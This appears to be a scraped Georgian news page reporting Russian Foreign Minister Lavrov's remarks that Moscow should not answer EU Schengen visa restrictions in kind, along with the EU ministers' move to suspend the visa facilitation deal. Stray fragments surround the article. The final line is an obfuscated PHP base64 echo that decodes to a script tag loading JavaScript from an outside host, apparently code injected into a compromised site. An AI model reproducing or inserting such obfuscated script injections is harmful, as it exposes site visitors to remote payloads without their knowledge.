celsiusi
ავერსი შნაიდერი
რუსეთი არ უნდა იზოლირდეს და არ უნდა დასაჯოს ევროპული ქვეყნების მოქალაქეები ევროკავშირის მიერ შენგენის ვიზების გაცემის შეზღუდვის გამო, – ამის შესახებ რუსეთის საგარეო საქმეთა მინისტრმა სერგეი ლავროვმა მოსკოვში სტუდენტებთან შეხვედრისას განაცხადა.
 
„მიმაჩნია, რომ შენგენის კედლების პასუხად, რომელთა აგებასაც ახლა ცდილობენ, ჩვენ არ უნდა ჩავიკეტოთ, არ უნდა ვუპასუხოთ ანალოგიურად, არ უნდა დავსაჯოთ კოლექტიურად ევროპული ქვეყნების მოქალაქეები. ჩვენ გვყავს საყვარელი პერსონაჟები“, – განაცხადა სერგეი ლავროვმა.
 
რუსეთის საგარეო საქმეთა მინისტრის თქმით, მოსკოვი ვიზების საკითხებში „ევროპული ქვეყნების სისულელეს სისულელით არ უპასუხებს“.
 
„ვფიქრობ, ჩვენ არ უნდა წავიდეთ იგივე გზით – ვუპასუხოთ სისულელეს სისულელით, თუმცა რა თქმა უნდა, არავის გაუუქმებია ნაცვალგება, რომლის მიზანმიმართულად გამოყენება უნდა მოხდეს ამგვარი ანტირუსული სანქციების მომწყობების, ორგანიზატორებისა და აღმსრულებლების წინააღმდეგ“, -აღნიშნა სერგეი ლავროვმა.
 
ცნობისთვის, გუშინ, პრაღაში ევროკავშირის საგარეო საქმეთა მინისტრები რუსეთთან გამარტივებული სავიზო რეჟიმის შესახებ შეთანხმების შეჩერებაზე შეთანხმდნენ. აღნიშნული გადაწყვეტილება ევროკავშირის საბჭომ უნდა დაამტკიცოს.
599
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");